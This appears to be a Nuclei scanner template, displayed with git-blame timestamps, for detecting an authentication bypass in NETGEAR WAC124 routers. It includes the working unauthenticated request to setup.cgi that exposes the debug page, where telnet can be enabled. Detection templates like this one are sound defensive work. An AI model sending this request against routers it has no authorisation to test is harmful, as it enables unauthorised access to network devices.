2022-03-27 15:10:41 +00:00
id : netgear-wac124-router-auth-bypass
info :
2022-10-19 21:11:27 +00:00
name : NETGEAR WAC124 - Authentication Bypass
2022-03-27 15:10:41 +00:00
author : gy741
severity : high
description : |
2022-10-19 21:11:27 +00:00
NETGEAR WAC124 AC2000 routers contain an authentication bypass vulnerability. An attacker can gain access by bypassing proper authentication, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-03-27 15:10:41 +00:00
reference :
- https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc
- https://kb.netgear.com/000064730/Security-Advisory-for-Multiple-Vulnerabilities-on-the-WAC124-PSV-2022-0044
2022-10-19 21:11:27 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.1
cwe-id : CWE-287
2022-03-27 15:10:41 +00:00
tags : netgear,auth-bypass,router,iot
requests :
- method : GET
path :
- "{{BaseURL}}/setup.cgi?next_file=debug.htm&x=currentsetting.htm"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
2022-10-19 21:11:27 +00:00
- "Enable Telnet"
# Enhanced by md on 2022/10/19